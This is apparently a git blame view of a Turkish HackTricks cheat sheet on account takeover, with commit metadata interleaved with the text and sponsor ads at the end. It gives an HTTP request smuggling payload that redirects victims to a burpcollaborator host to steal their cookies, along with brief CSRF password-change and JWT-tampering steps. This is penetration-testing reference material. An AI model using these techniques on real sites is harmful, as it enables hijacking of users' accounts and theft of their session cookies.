											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### HTTP İstek Kaçırma Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+\. Türde HTTP İstek Kaçırma (CL, TE, CL.TE) tespit etmek için **smuggler**'ı kullanın\
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
+								`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+\. `POST / HTTP/1.1`'i aşağıdaki verilerle üzerine yazacak bir istek oluşturun:\
 								`GET http://something.burpcollaborator.net HTTP/1.1 X:` hedef, kurbanları burpcollab'a yönlendirmek ve çerezlerini çalmaktır\
 \. Son istek aşağıdaki gibi olabilir
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
+								```
 								GET / HTTP/1.1
 								Transfer-Encoding: chunked
 								Host: something.com
 								User-Agent: Smuggler/v1.0
 								Content-Length: 83
 
 								GET http://something.burpcollaborator.net  HTTP/1.1
 								X: X
 								```
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								### Hesap Ele Geçirme CSRF Aracılığıyla <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+. CSRF için bir payload oluşturun, örn: "Şifre değişikliği için otomatik gönderimli HTML formu"
 . Payload'u gönderin
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								### JWT Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								JSON Web Token, bir kullanıcıyı doğrulamak için kullanılabilir.
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* JWT'yi başka bir Kullanıcı Kimliği / E-posta ile düzenleyin
 								* Zayıf JWT imzasını kontrol edin
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 								{% content-ref url="hacking-jwt-json-web-tokens.md" %}
 								[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
 								{% endcontent-ref %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Referanslar
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 								* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								### [WhiteIntel](https://whiteintel.io)
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
 								[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.
 								WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
 								Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
 								{% embed url="https://whiteintel.io" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								<summary><strong>Sıfırdan Kahraman'a AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								HackTricks'i desteklemenin diğer yolları:
-												a

											
										
										
											2024-02-03 14:45:32 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								* [**The PEASS Family**](https://opensea.io.peass) koleksiyonumuzdaki özel [**NFT'leri**](https://opensea.io/collection/the-peass-family) keşfedin
 								* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin.**
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
+								* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>